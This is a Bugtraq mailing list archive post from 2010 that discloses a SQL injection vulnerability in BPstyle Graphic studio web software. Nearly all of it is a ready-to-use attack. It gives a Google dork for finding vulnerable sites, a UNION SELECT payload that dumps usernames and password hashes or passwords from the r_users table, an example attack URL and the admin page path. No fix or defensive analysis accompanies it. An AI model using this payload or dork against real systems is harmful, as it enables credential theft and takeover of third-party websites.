Bugtraq mailing list archives
BPstyle - Graphic studio SQL Injection Vulnerabilities
From: md.r00t.defacer () gmail com
Date: Fri, 30 Apr 2010 02:14:49 -0600
#-------------------In The Name Of God------------ # BPstyle - Graphic studio SQL Injection Vulnerabilities ################################### #AUTHOR: md.r00t #Mail: md.r00t.defacer () gmail com #Webstie: www.r00t.gigfa.com # ################################### #Google D0rk: # "Designed and Created by: BPstyle - Graphic studio" # inurl:"/page/sindex.php?plug=" ################################### #Exploit: #--------- # -9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users-- ################################### #Example: # #http://www.Site.com/page/sindex.php?plug=1&aid=- 9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users-- ################################### #Admin Page: #http://www.Site.com/admin ################################### #TNX: #Aria-Security Team (Persian Security Network),Virangar Security Team *****************************************
Current thread:
- BPstyle - Graphic studio SQL Injection Vulnerabilities md . r00t . defacer (Apr 30)